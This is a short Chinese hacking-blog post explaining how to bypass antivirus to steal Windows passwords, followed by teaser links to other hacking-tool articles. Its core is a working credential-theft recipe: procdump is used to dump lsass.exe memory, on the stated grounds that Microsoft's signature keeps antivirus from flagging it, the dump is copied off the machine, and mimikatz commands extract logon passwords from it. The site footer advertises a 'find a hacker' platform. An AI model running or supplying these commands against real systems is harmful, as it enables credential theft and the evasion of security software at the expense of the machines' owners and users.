绕过杀毒软件抓取windows密码

hacker4年前 (2020-05-31)黑客文章713

使用procdump,由于是微软的东西,带微软签名杀软不会报毒。

procdump -accepteula -ma lsass.exe lsass.dmp

copy出 lsass.dmp到本机。

			mimikatz # sekurlsa::minidump lsass.dmp
		
			Switch to MINIDUMP
		
			mimikatz # sekurlsa::logonPasswords

具体可以参考原文：

http://blog.gentilkiwi.com/securite/mimikatz/minidump

标签: 黑客技术

返回列表

什么叫Metasploit？ 2004年，英国网络信息安全研究者和方案开发者HD Moore开始了Metasploit新项目，目地是建立一个公共性和随意浏览的資源，以得到可运用的科学研究和开发设计编...

关于Burp Suite： Burp Suite 是用于渗透测试web 应用程序的集成平台。它包含了许多工具，并为这些工具设计了许多接口，以促进加快渗透应...

什么叫WinDbg？ WinDbg，像OllyDbg，是由Microsoft派发的Microsoft Windows多功能程序调试。该黑客工具可用以调节客户方式程序运行，驱动软件和电脑操作系统自身，...

什么叫Cain和Abel黑客工具？ Cain和Abel是用以密码恢复的最火爆的专用工具之一。它能够根据应用例如暴力行为进攻，登陆密码分析攻击和最常见的词典进攻这类的方式来修复各种各样登陆密码。这...

Nmap实际作用：端口扫描器，协议书扫描仪，漏洞检测，绕开安全防护，漏洞检测等。一、Nmap端口扫描器端口号情况： 1、Open：端口号打开，有程序流程监视此端口号...

什么叫NoScript？ NoScript或有时候称之为NoScript Security Suite是为Mozilla Firefox，SeaMonkey和别的根据Mozilla的Web电脑浏览器...

找黑客平台